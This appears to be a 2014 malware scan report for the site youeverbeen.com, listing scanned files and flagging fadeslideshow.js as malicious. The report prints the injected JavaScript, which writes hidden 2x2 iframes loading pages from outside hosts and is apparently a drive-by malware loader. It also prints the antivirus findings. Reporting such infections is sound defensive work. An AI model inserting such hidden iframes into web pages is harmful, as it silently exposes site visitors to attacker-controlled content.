Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youeverbeen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://youeverbeen.com/ | 200 OK Content-Length: 3416 Content-Type: text/html | clean |
http://youeverbeen.com/js/prototype.js | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://youeverbeen.com/test404page.js | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://youeverbeen.com/js/scriptaculous.js?load=effects,builder | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://youeverbeen.com/js/lightbox.js | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://youeverbeen.com/fadeslideshow.js | 200 OK Content-Length: 14515 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1614279></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://artisticgenepool.com/oaaf.html?j=1614279></iframe>');
var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px .appendTo(setting.$wrapperdiv) } }, getCookie:function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie:function(name, value){ document.cookie = name+"=" + value + ";path=/" } }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1614279
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1614279>
Hidden iFrame found. size: 2x2 src: http://artisticgenepool.com/oaaf.html?j=1614279
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://artisticgenepool.com/oaaf.html?j=1614279>
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youeverbeen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 03:14:39 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 3416
Content-Type: text/html
Last-Modified: Wed, 28 May 2014 10:00:34 GMT
...3416 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: youeverbeen.com
Referer: http://www.google.com/search?q=youeverbeen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.